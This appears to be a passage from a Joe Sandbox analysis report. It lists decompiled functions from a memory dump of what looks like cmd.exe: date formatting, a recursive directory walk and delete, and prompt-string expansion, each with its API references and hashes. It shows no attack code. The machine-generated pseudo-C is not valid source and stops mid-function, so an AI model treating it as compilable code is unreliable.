0x00d85d07
0x00d85d09
0x00d85d23
0x00d85d29
0x00d85d2c
0x00d85d2c
0x00d85bf4
0x00d85bf4
0x00d85bf9
0x00d85bfe
0x00d85bfe
0x00d85c01
0x00000000
0x00d85c01
0x00d85bc3

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00DAF830,?,00002000), ref: 00D85B31
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D85B45
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00D85B59
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D85B6D
realloc.MSVCRT ref: 00D99C24

Part of subcall function 00D941A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00D85BA1,0000001F,?,00000080), ref: 00D941A4

GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00D85BA2
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 00D85C2A
memmove.MSVCRT ref: 00D85D23
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00D85D4D
realloc.MSVCRT ref: 00D85D68
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00D85D9C

Strings

%02d%s%02d%s%02d, xrefs: 00D99C5B
%s %s , xrefs: 00D99C9C
%s , xrefs: 00D99C7C

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
String ID: %02d%s%02d%s%02d$%s $%s %s
API String ID: 2927284792-4023967598
Opcode ID: 77e9d61382449ce84be34aff57a7c52bfea53f65039fad5a61b5580cf4a67fdb
Instruction ID: 69969e7525c8d6164cfe633946f14a3de868423a7e2944a47ab16dd917bf84eb
Opcode Fuzzy Hash: 77e9d61382449ce84be34aff57a7c52bfea53f65039fad5a61b5580cf4a67fdb
Instruction Fuzzy Hash: 41C1E9719003259FDF24AF54DC59AFFB7B9EB89310F1440A9E80AE7254DA319D85CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D885EA, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 378
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00D885EA(WCHAR* __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				struct _WIN32_FIND_DATAW _v1140;
				WCHAR* _v1144;
				long _v1148;
				void* _v1152;
				char _v1156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t104;
				short _t117;
				void* _t121;
				signed int _t122;
				signed int _t124;
				WCHAR* _t126;
				void* _t127;
				void* _t130;
				WCHAR* _t136;
				intOrPtr _t139;
				WCHAR* _t140;
				WCHAR* _t144;
				intOrPtr _t147;
				WCHAR* _t151;
				WCHAR* _t153;
				WCHAR* _t158;
				WCHAR* _t159;
				long _t160;
				long _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				WCHAR* _t168;
				WCHAR* _t169;
				void* _t173;
				void* _t177;
				long _t178;
				void* _t179;
				void* _t180;
				short* _t186;
				signed int _t188;
				long _t192;
				signed int _t193;
				signed int _t194;
				intOrPtr* _t197;
				signed int _t198;
				signed int _t199;
				intOrPtr* _t203;
				signed int _t205;
				WCHAR* _t207;
				char* _t208;
				char* _t209;
				long _t214;
				signed int _t220;
				WCHAR* _t221;
				signed int _t222;
				long _t223;
				signed int _t224;
				void* _t225;
				void* _t226;
				void* _t241;
				void* _t260;

				_t217 = __edx;
				_t104 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t104 ^ _t224;
				_v24 = 1;
				_t223 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t220 = __edx;
				_t176 = __ecx;
				_v1148 = __edx;
				_v1144 = __ecx;
				memset( &_v548, 0, 0x104);
				_t226 = _t225 + 0xc;
				if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t223 = 8;
					goto L43;
				} else {
					 *_t220 = 1;
					_t221 = _t176;
					_t186 =  &(_t221[1]);
					do {
						_t117 =  *_t221;
						_t221 =  &(_t221[1]);
					} while (_t117 != 0);
					_t222 = _t221 - _t186;
					_t220 = _t222 >> 1;
					if(_t222 == 0) {
						_t223 = 0xa1;
						L43:
						__imp__??_V@YAXPAX@Z();
						return E00D96FD0(_t223, _t176, _v8 ^ _t224, _t217, _t220, _t223, _v28);
					}
					if(_t220 + 3 > 0x7fe7) {
						L42:
						_t223 = E00D88885(_t176);
						goto L43;
					}
					_t121 = FindFirstFileW(_t176,  &_v1140);
					if(_t121 == 0xffffffff) {
						_t122 = 0x10;
						_t188 = 0;
						_v1140.dwFileAttributes = _t122;
						_v1140.dwReserved0 = 0;
					} else {
						FindClose(_t121);
						_t188 = _v1140.dwReserved0;
						_t122 = _v1140.dwFileAttributes;
					}
					if((_t122 & 0x00000010) == 0) {
						goto L42;
					} else {
						if((_t122 & 0x00000400) != 0) {
							__eflags = _t188 & 0x20000000;
							if((_t188 & 0x20000000) != 0) {
								goto L42;
							}
						}
						E00D90D89(_t217, _t176);
						_t124 =  *(_t176 + _t220 * 2 - 2) & 0x0000ffff;
						if(_t124 != 0x3a && _t124 != 0x5c) {
							E00D90CF2(_t217, "\\");
							_t220 = _t220 + 1;
						}
						E00D90CF2(_t217, "*");
						_t126 = _v28;
						if(_t126 == 0) {
							_t126 =  &_v548;
						}
						_t127 = FindFirstFileW(_t126,  &_v1140);
						_v1152 = _t127;
						if(_t127 == 0xffffffff) {
							goto L42;
						} else {
							while(1) {
								L14:
								_t241 =  *0xdad544 - _t223; // 0x0
								if(_t241 != 0) {
									break;
								}
								_t217 =  &(_v1140.cAlternateFileName);
								_t192 = _t217;
								_t177 = _t192 + 2;
								do {
									_t130 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t130 != _t223);
								_t193 = _t192 - _t177;
								_t194 = _t193 >> 1;
								if(_t193 != 0) {
									L21:
									if(_t194 + _t220 >= 0x7fe7) {
										_t176 = _v1144;
										_push(_t217);
										 *_v1148 = _t223;
										E00D8C5A2(_t194, 0x400023da, 2, _v1144);
										L41:
										FindClose(_v1152);
										_t260 =  *0xdad544 - _t223; // 0x0
										if(_t260 != 0) {
											goto L43;
										}
										goto L42;
									}
									_t134 = _v28;
									if(_v28 == 0) {
										_t134 =  &_v548;
									}
									E00D91040(_t134 + _t220 * 2, _v20 - _t220, _t217);
									_t178 = _v1140.dwFileAttributes;
									if((_t178 & 0x00000010) == 0) {
										__eflags = _t178 & 0x00000001;
										if((_t178 & 0x00000001) != 0) {
											_t207 = _v28;
											__eflags = _t207;
											if(_t207 == 0) {
												_t207 =  &_v548;
											}
											_t162 = _t178 & 0xfffffffe;
											__eflags = _t162;
											SetFileAttributesW(_t207, _t162);
										}
										_t196 = _v28;
										__eflags = _v28;
										if(_v28 == 0) {
											_t196 =  &_v548;
										}
										_t217 = _t178;
										_t136 = E00D883F2(_t196, _t178);
										__eflags = _t136;
										if(_t136 == 0) {
											goto L39;
										} else {
											__eflags = _t136 - 0x4d3;
											if(_t136 == 0x4d3) {
												break;
											}
											__eflags = _t136 - 3;
											if(_t136 == 3) {
												_t158 = _v28;
												__eflags = _t158;
												if(_t158 == 0) {
													_t158 =  &_v548;
												}
												__imp___wcsnicmp(_t158, L"\\\\?\\", 4);
												_t226 = _t226 + 0xc;
												__eflags = _t158;
												if(_t158 != 0) {
													_t159 = _v28;
													__eflags = _t159;
													if(_t159 == 0) {
														_t159 =  &_v548;
													}
													_t160 = GetFullPathNameW(_t159, _t223, _t223, _t223);
													__eflags = _t160 - 0x7fe7;
													if(_t160 > 0x7fe7) {
														SetLastError(0x6f);
													}
												}
											}
											_t197 =  &(_v1140.cAlternateFileName);
											_t217 = _t197 + 2;
											do {
												_t139 =  *_t197;
												_t197 = _t197 + 2;
												__eflags = _t139 - _t223;
											} while (_t139 != _t223);
											_t140 = _v28;
											_t198 = _t197 - _t217;
											__eflags = _t198;
											_t199 = _t198 >> 1;
											if(_t198 == 0) {
												L86:
												__eflags = _t140;
												if(_t140 == 0) {
													_t140 =  &_v548;
												}
												E00D8C5A2(_t199, 0x4000271b, 1, _t140);
												_t226 = _t226 + 0xc;
												L89:
												_push(_t223);
												_push(GetLastError());
												E00D8C5A2(_t199);
												_t144 = _v28;
												__eflags = _t144;
												if(_t144 == 0) {
													_t144 =  &_v548;
												}
												SetFileAttributesW(_t144, _t178);
												 *_v1148 = _t223;
												goto L39;
											}
											__eflags = _t140;
											if(_t140 == 0) {
												_t140 =  &_v548;
											}
											__eflags = 0;
											_t140[_t220] = 0;
											_t203 =  &(_v1140.cFileName);
											_t217 = _t203 + 2;
											do {
												_t147 =  *_t203;
												_t203 = _t203 + 2;
												__eflags = _t147 - _t223;
											} while (_t147 != _t223);
											_t205 = _t203 - _t217 >> 1;
											_t199 =  &_v548;
											__eflags = _t205 + _t220 - 0x7fe7;
											if(_t205 + _t220 < 0x7fe7) {
												E00D90CF2(_t217,  &(_v1140.cFileName));
												_t151 = _v28;
												__eflags = _t151;
												if(_t151 == 0) {
													_t151 =  &_v548;
												}
												E00D8C5A2(_t199, 0x4000271b, 1, _t151);
												_t153 = _v28;
												_t226 = _t226 + 0xc;
												__eflags = _t153;
												if(_t153 == 0) {
													_t153 =  &_v548;
												}
												_t153[_t220] = 0;
												_t199 =  &_v548;
												E00D90CF2(_t217,  &(_v1140.cAlternateFileName));
												goto L89;
											}
											E00D90CF2(_t217,  &(_v1140.cAlternateFileName));
											_t140 = _v28;
											goto L86;
										}
									} else {
										_t208 = ".";
										_t164 =  &(_v1140.cFileName);
										_t179 = 4;
										while(1) {
											_t217 =  *_t164;
											if(_t217 !=  *_t208) {
												break;
											}
											if(_t217 == 0) {
												L29:
												_t165 = _t223;
												L30:
												if(_t165 == 0) {
													L39:
													if(FindNextFileW(_v1152,  &_v1140) != 0) {
														goto L14;
													}
													goto L40;
												}
												_t209 = L"..";
												_t166 =  &(_v1140.cFileName);
												while(1) {
													_t217 =  *_t166;
													if(_t217 !=  *_t209) {
														break;
													}
													if(_t217 == 0) {
														L36:
														_t167 = _t223;
														L38:
														if(_t167 != 0) {
															_t210 = _v28;
															__eflags = _v28;
															if(_v28 == 0) {
																_t210 =  &_v548;
															}
															_t217 =  &_v1156;
															_t168 = E00D885EA(_t210,  &_v1156);
															__eflags =  *0xdad544 - _t223; // 0x0
															if(__eflags != 0) {
																goto L40;
															} else {
																__eflags = _t168;
																if(_t168 == 0) {
																	goto L39;
																}
																_t211 = _v1148;
																 *_v1148 = _t223;
																__eflags = _t168 - 0x91;
																if(_t168 != 0x91) {
																	L58:
																	_t169 = _v28;
																	__eflags = _t169;
																	if(_t169 == 0) {
																		_t169 =  &_v548;
																	}
																	E00D8C5A2(_t211, 0x4000271b, 1, _t169);
																	_t226 = _t226 + 0xc;
																	_push(_t223);
																	_push(GetLastError());
																	E00D8C5A2(_t211);
																	goto L39;
																}
																__eflags = _v1156 - _t223;
																if(_v1156 == _t223) {
																	goto L39;
																}
																goto L58;
															}
														}
														goto L39;
													}
													_t217 =  *((intOrPtr*)(_t166 + 2));
													_t47 =  &(_t209[2]); // 0x2e
													if(_t217 !=  *_t47) {
														break;
													}
													_t166 = _t166 + _t179;
													_t209 =  &(_t209[_t179]);
													if(_t217 != 0) {
														continue;
													}
													goto L36;
												}
												asm("sbb eax, eax");
												_t167 = _t166 | 0x00000001;
												__eflags = _t167;
												goto L38;
											}
											_t217 =  *((intOrPtr*)(_t164 + 2));
											_t44 =  &(_t208[2]); // 0x200000
											if(_t217 !=  *_t44) {
												break;
											}
											_t164 = _t164 + _t179;
											_t208 =  &(_t208[_t179]);
											if(_t217 != 0) {
												continue;
											}
											goto L29;
										}
										asm("sbb eax, eax");
										_t165 = _t164 | 0x00000001;
										goto L30;
									}
								}
								_t217 =  &(_v1140.cFileName);
								_t214 = _t217;
								_t180 = _t214 + 2;
								do {
									_t173 =  *_t214;
									_t214 = _t214 + 2;
								} while (_t173 != _t223);
								_t194 = _t214 - _t180 >> 1;
								goto L21;
							}
							L40:
							_t176 = _v1144;
							goto L41;
						}
					}
				}
			}

0x00d885ea
0x00d885f5
0x00d885fc
0x00d88607
0x00d8860c
0x00d8860e
0x00d88617
0x00d8861a
0x00d8861c
0x00d88620
0x00d88626
0x00d8862c
0x00d88639
0x00d88655
0x00d88882
0x00000000
0x00d8865b
0x00d8865b
0x00d88661
0x00d88663
0x00d88666
0x00d88666
0x00d88669
0x00d8866c
0x00d88671
0x00d88673
0x00d88675
0x00da03bb
0x00d88859
0x00d8885c
0x00d88875
0x00d88875
0x00d88683
0x00d88850
0x00d88857
0x00000000
0x00d88857
0x00d88691
0x00d8869a
0x00da03c7
0x00da03c8
0x00da03ca
0x00da03d0
0x00d886a0
0x00d886a1
0x00d886a7
0x00d886ad
0x00d886ad
0x00d886b5
0x00000000
0x00d886bb
0x00d886c0
0x00da03db
0x00da03e1
0x00000000
0x00000000
0x00da03e7
0x00d886cd
0x00d886d2
0x00d886da
0x00d886ec
0x00d886f1
0x00d886f1
0x00d886fd
0x00d88702
0x00d88707
0x00da03ec
0x00da03ec
0x00d88715
0x00d8871b
0x00d88724
0x00000000
0x00d8872a
0x00d8872a
0x00d8872a
0x00d8872a
0x00d88730
0x00000000
0x00000000
0x00d88736
0x00d8873c
0x00d8873e
0x00d88741
0x00d88741
0x00d88744
0x00d88747
0x00d8874c
0x00d8874e
0x00d88750
0x00d8876c
0x00d88774
0x00da0615
0x00da061b
0x00da0624
0x00da0626
0x00d8883b
0x00d88842
0x00d88848
0x00d8884e
0x00000000
0x00000000
0x00000000
0x00d8884e
0x00d8877a
0x00d8877f
0x00da03f7
0x00da03f7
0x00d8878e
0x00d88793
0x00d8879c
0x00da047a
0x00da047d
0x00da047f
0x00da0482
0x00da0484
0x00da0486
0x00da0486
0x00da048e
0x00da048e
0x00da0493
0x00da0493
0x00da0499
0x00da049c
0x00da049e
0x00da04a0
0x00da04a0
0x00da04a6
0x00da04a8
0x00da04ad
0x00da04af
0x00000000
0x00da04b5
0x00da04b5
0x00da04ba
0x00000000
0x00000000
0x00da04c0
0x00da04c3
0x00da04c5
0x00da04c8
0x00da04ca
0x00da04cc
0x00da04cc
0x00da04da
0x00da04e0
0x00da04e3
0x00da04e5
0x00da04e7
0x00da04ea
0x00da04ec
0x00da04ee
0x00da04ee
0x00da04f8
0x00da04fe
0x00da0503
0x00da0507
0x00da0507
0x00da0503
0x00da04e5
0x00da050d
0x00da0513
0x00da0516
0x00da0516
0x00da0519
0x00da051c
0x00da051c
0x00da0521
0x00da0524
0x00da0524
0x00da0526
0x00da0528
0x00da0571
0x00da0571
0x00da0573
0x00da0575
0x00da0575
0x00da0583
0x00da0588
0x00da058b
0x00da058b
0x00da0592
0x00da0593
0x00da0598
0x00da059d
0x00da059f
0x00da05a1
0x00da05a1
0x00da05a9
0x00da05b5
0x00000000
0x00da05b5
0x00da052a
0x00da052c
0x00da052e
0x00da052e
0x00da0534
0x00da0536
0x00da053a
0x00da0540
0x00da0543
0x00da0543
0x00da0546
0x00da0549
0x00da0549
0x00da0550
0x00da0555
0x00da055b
0x00da0560
0x00da05c3
0x00da05c8
0x00da05cb
0x00da05cd
0x00da05cf
0x00da05cf
0x00da05dd
0x00da05e2
0x00da05e5
0x00da05e8
0x00da05ea
0x00da05ec
0x00da05ec
0x00da05f4
0x00da05ff
0x00da0605
0x00000000
0x00da0605
0x00da0569
0x00da056e
0x00000000
0x00da056e
0x00d887a2
0x00d887a4
0x00d887a9
0x00d887af
0x00d887b0
0x00d887b0
0x00d887b6
0x00000000
0x00000000
0x00d887bf
0x00d887d8
0x00d887d8
0x00d887da
0x00d887dc
0x00d8881a
0x00d8882f
0x00000000
0x00000000
0x00000000
0x00d8882f
0x00d887de
0x00d887e3
0x00d887e9
0x00d887e9
0x00d887ef
0x00000000
0x00000000
0x00d887f4
0x00d88809
0x00d88809
0x00d88812
0x00d88814
0x00da0402
0x00da0405
0x00da0407
0x00da0409
0x00da0409
0x00da040f
0x00da0415
0x00da041a
0x00da0420
0x00000000
0x00da0426
0x00da0426
0x00da0428
0x00000000
0x00000000
0x00da042e
0x00da0434
0x00da0436
0x00da043b
0x00da0449
0x00da0449
0x00da044c
0x00da044e
0x00da0450
0x00da0450
0x00da045e
0x00da0463
0x00da0466
0x00da046d
0x00da046e
0x00000000
0x00da0474
0x00da043d
0x00da0443
0x00000000
0x00000000
0x00000000
0x00da0443
0x00da0420
0x00000000
0x00d88814
0x00d887f6
0x00d887fa
0x00d887fe
0x00000000
0x00000000
0x00d88800
0x00d88802
0x00d88807
0x00000000
0x00000000
0x00000000
0x00d88807
0x00d8880d
0x00d8880f
0x00d8880f
0x00000000
0x00d8880f
0x00d887c1
0x00d887c5
0x00d887c9
0x00000000
0x00000000
0x00d887cf
0x00d887d1
0x00d887d6
0x00000000
0x00000000
0x00000000
0x00d887d6
0x00d88876
0x00d88878
0x00000000
0x00d88878
0x00d8879c
0x00d88752
0x00d88758
0x00d8875a
0x00d8875d
0x00d8875d
0x00d88760
0x00d88763
0x00d8876a
0x00000000
0x00d8876a
0x00d88835
0x00d88835
0x00000000
0x00d88835
0x00d88724
0x00d886b5

APIs

memset.MSVCRT ref: 00D8862C

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 00D88691
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 00D886A1
FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00D8250C,?,?,?,-00000105), ref: 00D88715
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 00D88827
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 00D88842
??_V@YAXPAX@Z.MSVCRT ref: 00D8885C

Strings

\\?\, xrefs: 00DA04D4

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Find$File$CloseFirstmemset$Next
String ID: \\?\
API String ID: 3059144641-4282027825
Opcode ID: 573e14f6fb0248fff78b45b429db8e5ee38e560b1c06d4578e0b096e41ec8609
Instruction ID: 6eed6f81851a62176361da4994ea08f15db13e8014585127e09a9302f809c799
Opcode Fuzzy Hash: 573e14f6fb0248fff78b45b429db8e5ee38e560b1c06d4578e0b096e41ec8609
Instruction Fuzzy Hash: 96D1C371A002169BDF24EB64DC95BBE7775EF14300F9804A9E60AD7241EB30DE45DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00DA6FF0, Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00DA6FF0(void* __ecx) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				void _v50;
				void _v52;
				void _v54;
				short _v56;
				char _v124;
				char _v644;
				void* _v648;
				void* _v652;
				signed int _v656;
				signed short* _v660;
				signed short* _v664;
				WCHAR* _v668;
				signed int _v672;
				void* _v676;
				char _v680;
				char _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t111;
				signed int _t112;
				intOrPtr _t119;
				void _t121;
				signed short _t122;
				signed int _t125;
				signed int _t126;
				void _t131;
				void _t136;
				intOrPtr* _t138;
				void _t142;
				signed int _t153;
				signed short* _t163;
				intOrPtr* _t164;
				void* _t167;
				signed short* _t173;
				signed int _t174;
				void* _t184;
				signed int _t187;
				void* _t188;
				signed int _t189;
				signed int _t190;
				void* _t191;
				signed int _t193;
				void* _t196;
				void* _t199;
				signed short* _t200;
				void* _t201;
				intOrPtr* _t202;
				signed int _t204;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				signed short* _t213;
				void* _t214;
				signed int _t219;
				signed int _t221;
				intOrPtr _t222;
				signed int _t226;
				intOrPtr _t227;
				intOrPtr _t228;

				_t153 = _t219;
				_push(__ecx);
				_push(__ecx);
				_t221 = (_t219 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				_t217 = _t221;
				_push(0xfffffffe);
				_push(0xdac140);
				_push(E00D97290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t153);
				_t222 = _t221 - 0x288;
				_t111 =  *0xdad0b4; // 0x35c4fbb8
				_v20 = _v20 ^ _t111;
				_t112 = _t111 ^ _t221;
				_v48 = _t112;
				_push(_t112);
				_t113 =  &_v28;
				 *[fs:0x0] =  &_v28;
				_v36 = _t222;
				_v672 = 0;
				_t226 =  *0xdad544; // 0x0
				if(_t226 != 0) {
					_push(0);
					_push(0x2335);
					_t113 = E00D8C108(__ecx);
					EnterCriticalSection( *0xdb3858);
					 *0xdad544 = 0;
					LeaveCriticalSection( *0xdb3858);
				}
				_t227 =  *0xdad0c8; // 0x1
				if(_t227 == 0) {
					L96:
					 *[fs:0x0] = _v28;
					_pop(_t199);
					_pop(_t207);
					return E00D96FD0(_t113, _t153, _v48 ^ _t217, _t182, _t199, _t207);
				} else {
					_t228 =  *0xdad5c8; // 0x0
					if(_t228 == 0) {
						E00D925D9(L"\r\n");
					}
					if( *0xdb7896 == 0) {
						_t200 = E00D8CFBC(L"PROMPT");
						_v660 = _t200;
						if(_t200 != 0) {
							_v660 = 0xdc8110;
							E00D91040(0xdc8110, 0x200, _t200);
							 *0xdb7896 = 1;
						}
					} else {
						_v660 = 0xdc8110;
					}
					_t160 =  *0xdc3cb8;
					if( *0xdc3cb8 == 0) {
						_t160 = 0xdc3ab0;
					}
					_t182 =  *0xdc3cc0;
					E00D936CB(_t153, _t160,  *0xdc3cc0, 0);
					_t113 = E00DA6FA6( &_v680);
					_v676 = _t113;
					if(_t113 == 0) {
						goto L96;
					} else {
						_t201 = _t113;
						_v652 = _t201;
						 *_t113 = 0;
						_t209 = _v680 - 1;
						_v648 = _t209;
						_t163 = _v660;
						if(_t163 == 0) {
							L86:
							_t117 =  *0xdc3cb8;
							if( *0xdc3cb8 == 0) {
								_t117 = 0xdc3ab0;
							}
							_t202 = _v676;
							E00D9274C(_t202, _t209, L"%s>", _t117);
							_t164 = _t202;
							_t103 = _t164 + 2; // 0x2
							_t210 = _t103;
							do {
								_t119 =  *_t164;
								_t164 = _t164 + 2;
							} while (_t119 != 0);
							_t201 = _t202 + (_t164 - _t210 >> 1) * 2;
							L91:
							_t167 = 0;
							L92:
							 *_t201 = 0;
							_t203 = _v676;
							_t184 = _v676;
							_t107 = _t184 + 2; // 0x2
							_t211 = _t107;
							do {
								_t121 =  *_t184;
								_t184 = _t184 + 2;
							} while (_t121 != _t167);
							_t182 = _t184 - _t211 >> 1;
							_t113 = E00D92616(_t203, _t184 - _t211 >> 1);
							if( *0xdad544 != 0) {
								EnterCriticalSection( *0xdb3858);
								 *0xdad544 =  *0xdad544 & 0x00000000;
								LeaveCriticalSection( *0xdb3858);
							}
							goto L96;
						}
						_t122 =  *_t163 & 0x0000ffff;
						if(_t122 == 0) {
							goto L86;
						}
						L14:
						while(_t122 != 0) {
							if(_t122 == 0x24) {
								_t213 =  &(_v660[1]);
								_v660 = _t213;
								_v664 = _t213;
								_t204 = 0;
								_v656 = 0xd83b90;
								while(towupper( *_t213 & 0x0000ffff) !=  *_v656) {
									_t204 = _t204 + 1;
									_t35 = 0xd83b90 + _t204 * 6; // 0x30050
									_t138 = _t35;
									_v656 = _t138;
									_t167 = 0;
									if( *_t138 != 0) {
										continue;
									}
									L28:
									_t125 = _t204 * 6;
									_t201 = _v652;
									_t214 = _v648;
									if( *((intOrPtr*)(_t125 + 0xd83b90)) == _t167) {
										goto L92;
									}
									_t40 = _t125 + 0xd83b92; // 0x3
									_t187 =  *_t40 & 0x0000ffff;
									if(_t187 != 8) {
										_t45 = _t187 - 1; // 0x2
										_t126 = _t45;
										if(_t126 > 9) {
											L78:
											_t127 =  *0xdc3cb8;
											if( *0xdc3cb8 == 0) {
												_t127 = 0xdc3ab0;
											}
											E00D9274C(_t201, _t214, L"%c",  *_t127 & 0x0000ffff);
											_t222 = _t222 + 0x10;
											_t188 = _t201;
											_v664 = _t188 + 2;
											do {
												_t131 =  *_t188;
												_t188 = _t188 + 2;
											} while (_t131 != 0);
											_t189 = _t188 - _v664;
											L83:
											_t190 = _t189 >> 1;
											_t209 = _t214 - _t190;
											_t201 = _t201 + _t190 * 2;
											L84:
											_v648 = _t209;
											_v652 = _t201;
											L85:
											_t173 =  &(_v660[1]);
											_v660 = _t173;
											_t122 =  *_t173 & 0x0000ffff;
											goto L14;
										}
										switch( *((intOrPtr*)(_t126 * 4 +  &M00DA7698))) {
											case 0:
												_t132 = E00D896A0(0, 1, _t201, _t214);
												goto L36;
											case 1:
												__edx = 0;
												__edx = 1;
												__ecx = 0;
												__eax = E00D85AEF(0, 1, __edi, __esi);
												L36:
												_t201 = _t201 + _t132 * 2;
												_t209 = _t214 - _t132;
												goto L84;
											case 2:
												__eax =  *0xdc3cb8;
												if( *0xdc3cb8 == 0) {
													__eax = 0xdc3ab0;
												}
												__eax = E00D9274C(__edi, __esi, L"%s", __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 3:
												__ecx =  &_v124;
												E00D8443C(__ecx) =  &_v124;
												__esi = E00D8B3FC(__ecx, 0x2350,  &_v124);
												E00D9274C(__edi, _v648, L"%s", __esi) = LocalFree(__esi);
												__edx = __edi;
												__esi = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - __esi;
												__esi = _v648;
												goto L83;
											case 4:
												__eax = 0xd83948;
												if(_v672 == 0) {
													__eax = 0xd83958;
												}
												__edx = __esi;
												__ecx = __edi;
												__eax = E00D91040(__edi, __esi, __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 5:
												__edx = __esi;
												__ecx = __edi;
												__eax = E00D91040(__edi, __esi, L"\r\n");
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 6:
												goto L78;
											case 7:
												if( *0xdc3cc9 == 0) {
													goto L85;
												}
												__ecx =  *0xdc3ce4;
												while(__esi > 1) {
													__eax = __ecx;
													__ecx = __ecx - 1;
													if(__eax == 0) {
														goto L85;
													}
													_push(0x2b);
													_pop(__eax);
													 *__edi = __ax;
													__edi = __edi + 2;
													_v652 = __edi;
													__esi = __esi - 1;
													_v648 = __esi;
												}
												goto L85;
											case 8:
												if( *0xdc3cc9 == 0) {
													goto L85;
												}
												_v668 = __ecx;
												__ecx =  *0xdc3cb8;
												__eax = __ecx;
												if(__ecx == 0) {
													__eax = 0xdc3ab0;
												}
												__ax =  *__eax;
												_v56 =  *__eax;
												if(__ecx == 0) {
													__ecx = 0xdc3ab0;
												}
												__ax =  *((intOrPtr*)(__ecx + 2));
												_v54 = __ax;
												_push(0x5c);
												_pop(__eax);
												_v52 = __ax;
												__eax = 0;
												_v50 = __ax;
												__eax =  &_v56;
												if(GetDriveTypeW( &_v56) != 4) {
													goto L85;
												} else {
													__eax = 0;
													_v52 = __ax;
													_v684 = 0x104;
													_v16 = _v16 & 0;
													__eax = E00D97797(__ecx);
													if(__al == 0) {
														_v668 = 0x78;
													} else {
														__eax =  &_v684;
														_push( &_v684);
														__eax =  &_v644;
														_push( &_v644);
														__eax =  &_v56;
														_push( &_v56);
														__eax =  *0xdcc028();
														_v668 =  &_v56;
													}
													_v16 = 0xfffffffe;
													if(_v668 == 0) {
														 &_v644 = E00D9274C(__edi, __esi, L"%s ",  &_v644);
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													} else {
														if(_v668 == 0x8ca) {
															goto L85;
														}
														_push(L"Unknown");
														_push(__esi);
														_push(__edi);
														__eax = E00D9274C();
														__esp = __esp + 0xc;
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													}
